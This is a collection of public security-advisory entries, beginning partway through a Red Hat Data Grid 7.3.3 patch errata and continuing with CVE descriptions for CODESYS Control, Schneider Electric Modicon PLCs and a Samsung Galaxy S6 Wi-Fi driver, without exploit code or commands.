wildfly: Race condition on PID file allows for termination of arbitrary processes by local users (CVE-2019-3805) * undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888) * undertow: DEBUG log for io.undertow.request.security if enabled leaks credentials to log files (CVE-2019-10212) * undertow: Information leak in requests for directories without trailing slashes (CVE-2019-10184) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 3. Solution: To install this update, do the following: 1. Download the Data Grid 7.3.3 server patch from the customer portal. 2. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. 3. Install the Data Grid 7.3.3 server patch. Refer to the 7.3 Release Notes for patching instructions. 4. Restart Data Grid to ensure the changes take effect. 4. Bugs fixed (https://bugzilla.redhat.com/): 1610877 - CVE-2018-14335 h2: Information Exposure due to insecure handling of permissions in the backup 1660263 - CVE-2019-3805 wildfly: Race condition on PID file allows for termination of arbitrary processes by local users 1693777 - CVE-2019-3888 undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed 1703469 - CVE-2019-10174 infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods 1713068 - CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashes 1722971 - CVE-2019-10173 xstream: remote code execution due to insecure XML deserialization (regression of CVE-2013-7285) 1731984 - CVE-2019-10212 undertow: DEBUG log for io.undertow.request.security if enabled leaks credentials to log files 1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth 1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth 1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth 1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption 1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution 5. References: https://access.redhat.com/security/cve/CVE-2018-14335 https://access.redhat.com/security/cve/CVE-2019-3805 https://access.redhat.com/security/cve/CVE-2019-3888 https://access.redhat.com/security/cve/CVE-2019-9512 https://access.redhat.com/security/cve/CVE-2019-9514 https://access.redhat.com/security/cve/CVE-2019-9515 https://access.redhat.com/security/cve/CVE-2019-9518 https://access.redhat.com/security/cve/CVE-2019-10173 https://access.redhat.com/security/cve/CVE-2019-10174 https://access.redhat.com/security/cve/CVE-2019-10184 https://access.redhat.com/security/cve/CVE-2019-10212 https://access.redhat.com/security/cve/CVE-2019-14379 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product\xdata.grid&downloadType=patches&version=7.3 https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html-single/red_hat_data_grid_7.3_release_notes/index 6. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBXmD2b9zjgjWX9erEAQhDqA/9G7uM0HlTt4M6Z9Zc23FSbbr+jj1k/o69 a5WWa+xS3Ko4IvlN5rt+wOHSFet+NTMAerNHzAsB2+viX1hr14Hwf3QnIom/yxbJ PaC1djdaZfcvSIODhbq/C5Ilae09x3rW1voQ39i1Q2bsEqVePLZdC75KjvNLsfqe QJCMvcO3jkccxn7k45baCfTGsFyOhHb17Y9DRarWsC7jO9kEjMxrUPN6qKP6BC9t RMuqDxo1aJnatMeCWb7NA0UpOz0+lFpuR+ZZYPV444nGmfTKrbc9c5TuQUCSP+LD sG1+fh2xMztuGxNiJfgSP3iqHmgXD9TBxh1kxn1kt59llCO5+Uqu/O5OsqeQQ0Ym I+a2VAzn2N776sTbWIZ3231IJex68oG+4/fIo6/FVVJpmtDIDgumgErTPD0kkNuT yyyn3u50RZohzSxEz37QdiQDJbiJcJhmtFR5fLRAbFa8Ys2Gw81PGFba95/kVooX K5uSukzOBm8nhxfBvwZDCY/gWuJwVLSAOJb4VoPZiR2WbZsx+9r+spQv6K9wYr5v s//DY88rsUSaMH4kGco//6Dqis8IwOISr/ZR+Edlnrz1rHv9Z4XerMw56VUKIHva mS7rdNmbLqHN0XfZImxewLca2i7sWIlxWrgKF2f4zEO3ermivdis7RdssZkJ9Zv9 S7B2VoNOQj4=zoia -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

In 3S-Smart Software Solutions GmbH CODESYS Control V3 products prior to version 3.5.14.0, user access management and communication encryption is not enabled by default, which could allow an attacker access to the device and sensitive information, including user credentials. 3S-Smart CODESYS Control for BeagleBone, etc. are all German 3S-Smart Software Solutions company's programming software for industrial control system development. The following products and versions are affected: 3S-Smart CODESYS Control for BeagleBone, CODESYS Control for emPC-A / iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (part of CODESYS setup), CODESYS V3 Simulation Runtime (part of CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. Successful exploitation may aid in launching further attacks

An Improper Check for Unusual or Exceptional Conditions vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 where an unauthenticated user can send a specially crafted XML data via a POST request to cause the web server to become unavailable. plural Schneider Electric The product contains an exceptional condition check vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state

An Information Exposure through Discrepancy vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 where the web server sends different responses in a way that exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. plural Schneider Electric The product contains an information disclosure vulnerability.Information may be obtained. SchneiderElectricModiconM340 and others are programmable logic controller products from Schneider Electric of France

Buffer overflow in dhd_bus_flow_ring_create_response in drivers/net/wireless/bcmdhd4358/dhd_pcie.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allow an attacker (who has obtained code execution on the Wi-Fi) chip to cause the device driver to perform invalid memory accesses. The Samsung ID is SVE-2018-11785. Samsung Galaxy S6 SM-G920F Contains a buffer error vulnerability. Vendors have confirmed this vulnerability Samsung ID: SVE-2018-11785 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SamsungGalaxyS6 is a smartphone released by South Korea's Samsung. Bcmdhd4358 Wi-Fidriver is one of the Wi-Fi drivers. An attacker could exploit the vulnerability to cause device drivers to access invalid memory

Buffer overflow in dhd_bus_flow_ring_flush_response in drivers/net/wireless/bcmdhd4358/dhd_pcie.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 allow an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device driver to perform invalid memory accesses. The Samsung ID is SVE-2018-11785. Samsung Galaxy S6 Contains a buffer error vulnerability. Vendors have confirmed this vulnerability Samsung ID: SVE-2018-11785 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SamsungGalaxyS6 is a smartphone released by South Korea's Samsung. Bcmdhd4358 Wi-Fidriver is one of the Wi-Fi drivers. An attacker could exploit the vulnerability to cause device drivers to access invalid memory

Buffer overflow in dhd_bus_flow_ring_delete_response in drivers/net/wireless/bcmdhd4358/dhd_pcie.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allow an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device driver to perform invalid memory accesses. The Samsung ID is SVE-2018-11785. Samsung Galaxy S6 SM-G920F Contains a buffer error vulnerability. Vendors have confirmed this vulnerability Samsung ID: SVE-2018-11785 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SamsungGalaxyS6 is a smartphone released by South Korea's Samsung. Bcmdhd4358 Wi-Fidriver is one of the Wi-Fi drivers. An attacker could exploit the vulnerability to cause device drivers to access invalid memory

A NULL pointer dereference in dhd_prot_txdata_write_flush in drivers/net/wireless/bcmdhd4358/dhd_msgbuf.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allows an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device to reboot. The Samsung ID is SVE-2018-11783. Samsung Galaxy S6 SM-G920F Is NULL A vulnerability related to pointer dereference exists. Vendors have confirmed this vulnerability Samsung ID: SVE-2018-11783 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. SamsungGalaxyS6 is a smartphone released by South Korea's Samsung. Bcmdhd4358 Wi-Fidriver is one of the Wi-Fi drivers. An attacker could exploit the vulnerability to cause a device reboot